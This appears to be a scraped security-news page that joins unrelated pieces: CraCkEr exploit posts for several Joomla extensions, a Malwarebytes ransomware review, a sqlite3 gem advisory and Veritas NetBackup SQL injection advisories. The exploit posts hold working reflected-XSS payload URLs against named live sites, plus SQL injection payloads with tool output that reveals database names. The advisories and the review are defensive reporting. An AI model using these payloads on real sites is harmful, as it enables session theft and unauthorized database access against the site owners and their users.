Joomla Solidres extension version 2.12.9 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                      [ Exploits ]                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : extensions.joomla.org                                                      │  
│  Vendor   : Solidres Team                                                              │  
│  Software : Joomla Solidres 2.12.9                                                     │  
│  Vuln Type: Reflected XSS                                                              │  
│  Method   : GET                                                                        │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2022                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/

https://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4&

GET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

[-] Done

Joomla Solidres 2.12.9 Cross Site Scripting

Categories: Threat Intelligence
In September, LockBit accounted for almost half of all known ransomware attacks.



(Read more...)




The post Ransomware review: September 2022 appeared first on Malwarebytes Labs.

_Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom. This article is also available to download as a Malwarebytes Threat Intelligence report._

LockBit was the most prevalent ransomware in September, as it has been for all of 2022.

Known ransomware attacks by gang, September 2022

LockBit was involved in almost six times as many attacks as the next most prevalent ransomware, Black Basta, and almost as many attacks as every other variant combined, accounting for 48 percent of known attacks.

While there are a large number of ransomware variants, only a handful accounted for more than two known attacks in September, and only six were involved in more than ten attacks. The gap between LockBit and the its competitors is now huge, which makes us wonder if what we are seeing is consolidation in this criminal space.

It is common for mature software markets to end up with a single dominant player and there is no reason why criminal software markets should be any different. Ransomware-as-a-Service (RaaS) has been effectively "feature complete" for several years, and innovations tend to happen in the tactics used by ransomware operators rather than in the software.

The share of known RaaS attacks involving LockBit

The chart of known ransomware attacks by country for September had a familiar look, with 36 percent of known ransomware attacks happening in the USA, and major European countries featuring prominently, if some way behind.

The presence of Japan and Taiwan in the top 10 is unusual, but only represents a relatively small increase in attacks. A large number of countries receive just a few attacks each month and small, random fluctuations are enough to see them enter and leave our "Other" category.

Known ransomware attacks by country, September 2022

The chart of attacks by industry sector has a similarly familiar look, with "Services" being the most seriously afflicted sector in September, just as it has been all year.

Known ransomware attacks by industry sector, September 2022

**LockBit 3.0 leak**

A few months ago, the LockBit gang released version 3.0 of its ransomware, LockBit 3.0 Black, which was based on source code from BlackMatter ransomware. In September the builder for LockBit 3.0 was leaked by what seems to be a disgruntled developer.

The leak is a double-edged sword. On the one hand, we were happy to get our hands on it, take it for a test drive and learn everything we could. (You can learn more about that in our article A first look at the builder for LockBit 3.0 Black.) On the other hand, anything that makes ransomware even easier to get hold of is likely to make things worse, not better, and we may see new criminal gangs who aren't affiliated with LockBit using it in future. Anyone tempted to try their hand should be warned though—there is no honor among thieves and we fully expect to see fake versions of LockBit's builder that infect would-be criminals running it instead of creating ransomware builds for them.

Encrypting and decrypting using LockBit 3.0 Black

The BlackMatter source code may have arrived in LockBit's hands courtesy of a developer who "defected" from the ALPHV group (also known as BlackCat), a dangerous ransomware gang that has spent most of 2022 in LockBit's long shadow. ALPHV is a rebrand of the BlackMatter group, which was itself a somewhat botched rebrand of DarkSide, which disappeared following significant law enforcement attention after its attack on the USA's Colonial Pipeline.

Despite a veneer of professionalism, one thing RaaS gangs seem unable to resist for long is the opportunity to boast, grandstand, and fall out. The tiresome gossip and politics of ransomware gangs often takes place on ransomware forums, and last month one of those forums hosted a public spat between ALPHV and LockBit, where the two gangs raked over the BlackMatter rebrand and LockBit's acquisition of its source code.

ALPHV and LockBit arguing on a ransomware forum

LockBit is on a bit of a roll with publicity stunts. Having previously grabbed headlines by offering bug bounties, and threatening to add DDoS attacks to its roster, this month it slaked its hunger for publicity by joking that it would give $1,000 to anyone who got a tattoo of the gang's logo.

The LockBit tattoo offer

Incidentally, while the RaaS ecosystem has existed for several years, the gangs within it change regularly and frequently disappear, particularly when they attract the attention of the FBI. We can't help wondering how badly "LockBit is eternal" is going to age.

Speaking of aging badly, it seems that some people either didn't get the joke, or just really, really wanted the money.

> Previously, Lockbit ransomware group stated online that they would pay anyone $1,000 if they tattooed the Lockbit ransomware group logo on themselves.
> 
> People (more than 1) have done it. pic.twitter.com/PPTtt3ze6g
> 
> — vx-underground (@vxunderground) September 9, 2022

**Off the beaten track**

Two new groups emerged in September, and another did something a bit unusual.

FARGO (also known as TargetCompany) has been around since February but made headlines in September by targeting Microsoft SQL servers directly. Files are stolen and encrypted, and leaks are conducted via Telegram rather than through a Dark Web leak site like most RaaS.

The two newcomers, Sparta and Royal, are data leak gangs—groups that don't encrypt data but simply steal it and threaten to leak it. This is no surprise—last month we conjectured that data leakage might be the future of ransomware.

The Sparta leak site

The Royal Dark Web site

Ransomware review: September 2022

### Summary

The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to [v3.39.4](https://sqlite.org/releaselog/3_39_4.html).

libsqlite v3.39.4 addresses a vulnerability described as follows in the release notification:

> Version 3.39.4 is a minimal patch against the prior release that addresses issues found since the
> prior release. In particular, a potential vulnerability in the FTS3 extension has been fixed, so
> this should be considered a security update.
>
> In order to exploit the vulnerability, an attacker must have full SQL access and must be able to
> construct a corrupt database with over 2GB of FTS3 content. The problem arises from a 32-bit
> signed integer overflow.

This vulnerability has not been assigned a CVE and does not have a severity declared.

Please note that this advisory only applies to the sqlite3 gem v1.5.0, and only if the packaged libsqlite is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libsqlite release announcements.


### Mitigation

Upgrade to the rubygem sqlite3 v1.5.1 or later.

Users who are unable to upgrade the sqlite3 gem may also choose a more complicated mitigation: compile and link sqlite3 against external libsqlite >= 3.39.4 which will also address these same issues.


### References

- Upstream release notes: https://sqlite.org/releaselog/3_39_4.html
- Instructions for compiling against system libraries: https://github.com/sparklemotion/sqlite3-ruby

**Summary**

The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.

libsqlite v3.39.4 addresses a vulnerability described as follows in the release notification:

> Version 3.39.4 is a minimal patch against the prior release that addresses issues found since the  
> prior release. In particular, a potential vulnerability in the FTS3 extension has been fixed, so  
> this should be considered a security update.
> 
> In order to exploit the vulnerability, an attacker must have full SQL access and must be able to  
> construct a corrupt database with over 2GB of FTS3 content. The problem arises from a 32-bit  
> signed integer overflow.

This vulnerability has not been assigned a CVE and does not have a severity declared.

Please note that this advisory only applies to the sqlite3 gem v1.5.0, and only if the packaged libsqlite is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's libsqlite release announcements.

**Mitigation**

Upgrade to the rubygem sqlite3 v1.5.1 or later.

Users who are unable to upgrade the sqlite3 gem may also choose a more complicated mitigation: compile and link sqlite3 against external libsqlite >= 3.39.4 which will also address these same issues.

**References**

*   Upstream release notes: https://sqlite.org/releaselog/3\_39\_4.html
*   Instructions for compiling against system libraries: https://github.com/sparklemotion/sqlite3-ruby

**References**

*   GHSA-mgvv-5mxp-xq67
*   https://github.com/sparklemotion/sqlite3-ruby/releases/tag/v1.5.1

GHSA-mgvv-5mxp-xq67: SQLite3 addresses vulnerability in packaged version of libsqlite

An issue was discovered in Veritas NetBackup through 10.0 and related Veritas products. The NetBackup Primary server is vulnerable to a SQL Injection attack affecting idm, nbars, and SLP manager code.

**Revision History**

*   1.0: End of September 2022 – Initial Public Release

**Summary**

Veritas has addressed vulnerabilities affecting NetBackup Primary servers.

**Issues**

**Issue #1: SQL Injection**

The NetBackup Primary server is vulnerable to a SQL Injection attack affecting the NBFSMCLIENT service.

*   CVE ID: TBA
*   Severity: Critical
*   CVSS v3.1 Base Score: 9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
*   Impacted Components: Primary Server
*   Affected Versions: 10.0 and earlier
*   Recommended action: 
    *   NetBackup Primary & Media Servers : Upgrade to NetBackup 8.2, 8.3.0.1, 8.3.0.2, 9.0.0.1, 9.1.0.1, 10.0 and apply appropriate Hotfix OR upgrade to 10.0.0.1
    *   NetBackup Clients: not impacted. No action needed.
    *   NetBackup Appliance: Upgrade to 3.2, 3.3.0.1, 3.3.0.2, 4.0.0.1, 4.1.0.1, 5.0 and apply appropriate Hotfix or upgrade to 5.0.0.1 MR1.
    *   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances
    *   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Issue #2: SQL Injection**

The NetBackup Primary server is vulnerable to a 2nd order SQL Injection attack affecting the NBFSMCLIENT service by leveraging Issue #1 in this advisory.

*   CVE ID: TBA
*   Severity: High
*   CVSS v3.1 Base Score: 8.0 (AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)  
    
*   Impacted Components: Primary Server
*   Affected Versions: 10.0 and earlier
*   Recommended action: 
    *   NetBackup Primary & Media Servers : Upgrade to NetBackup 8.2, 8.3.0.1, 8.3.0.2, 9.0.0.1, 9.1.0.1, 10.0 and apply appropriate Hotfix OR upgrade to 10.0.0.1
    *   NetBackup Clients: not impacted. No action needed.
    *   NetBackup Appliance: Upgrade to 3.2, 3.3.0.1, 3.3.0.2, 4.0.0.1, 4.1.0.1, 5.0 and apply appropriate Hotfix OR upgrade to 5.0.0.1 MR1.
    *   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances
    *   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Issue #3: SQL Injection**

The NetBackup Primary server is vulnerable to a SQL Injection attack affecting idm, nbars, and SLP manager code.

*   CVE ID: TBA
*   Severity: High
*   CVSS v3.1 Base Score: 8.0 (AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)
*   Impacted Components: Primary Server
*   Affected Versions: 10.0 and earlier
*   Recommended action: 
    *    NetBackup Primary & Media Servers: Upgrade to NetBackup 8.2, 8.3.0.1, 8.3.0.2, 9.0.0.1, 9.1.0.1, 10.0 and apply appropriate Hotfix OR upgrade to 10.0.0.1
    *   NetBackup Clients: not impacted. No action needed.
    *   NetBackup Appliance: Upgrade to 3.2, 3.3.0.1, 3.3.0.2, 4.0.0.1, 4.1.0.1, 5.0 and apply appropriate Hotfix OR upgrade to 5.0.0.1 MR1.
    *   Flex Appliance: Please apply the NetBackup Hotfix corresponding to the NetBackup Container version on Flex appliances
    *   Flex Scale: Please contact Veritas Technical Support and reference Knowledge Article ID 100053006 to obtain a fix.

**Notes**

This Security Advisory, VTS22-011, also addresses the issues identified in VTS22-004 which was released earlier. If you have not already applied VTS22-004, it is not necessary to apply it first. If you have already applied VTS22-004 you can safely apply VTS22-011 on top of it.

**Questions**

For questions or problems regarding this advisory please contact Veritas Technical Support (https://www.veritas.com/support)

**Acknowledgement**

Veritas would like to thank the following Airbus Security Team members for notifying us about these issues:    
Mouad Abouhali, Benoît Camredon, Nicholas Devillers, Anaïs Gantet, and Jean-Romain Garnier.

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2022-42304: Hotfix for Security Advisory Impacting NetBackup Servers

An issue was discovered in Veritas NetBackup through 10.0 and related Veritas products. The NetBackup Primary server is vulnerable to a second-order SQL Injection attack affecting the NBFSMCLIENT service by leveraging CVE-2022-42302.

CVE-2022-42303: Hotfix for Security Advisory Impacting NetBackup Servers

An issue was discovered in Veritas NetBackup through 10.0 and related Veritas products. The NetBackup Primary server is vulnerable to a SQL Injection attack affecting the NBFSMCLIENT service.

CVE-2022-42302: Hotfix for Security Advisory Impacting NetBackup Servers

Joomla Rentalot Plus extension version 19.05 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Les Arbres Design                                                          ││  Software : Joomla Rentalot Plus 19.05                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /check-viewGET parameter 'instance' is vulnerable to XSShttps://demo.lesarbresdesign.info/check-view?option=com_rentalotplus&controller=check&task=ajax_get_availability&format=raw&tmpl=component&version=detailed&datefrom=&currency=undefined&instance=byhiw"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"onuph[-] Done

Joomla Rentalot Plus 19.05 Cross Site Scripting

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217GET parameter 'limitstart' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7GET parameter 'limit' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly[-] Done

Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL              CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable---Parameter: sortdir (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)    Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25---[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.1.33back-end DBMS: MySQL >= 5.1 (MariaDB fork)[INFO] fetching current databasecurrent database: 'stenen_test'[-] Done

Joomla MarvikShop ShoppingCart 3.4 SQL Injection

Joomla JKassa ShoppingCart extension version 2.0.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : GeneticsPro - jkassa.com                                                   ││  Software : Joomla JKassa ShoppingCart 2.0.0                                           ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /shop/men/sweatshirts.feedGET parameter 'manufacturer' is vulnerable---Parameter: manufacturer (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.4.16back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)current database: 'jkassa_umarket'[-] Done

Tag

#sql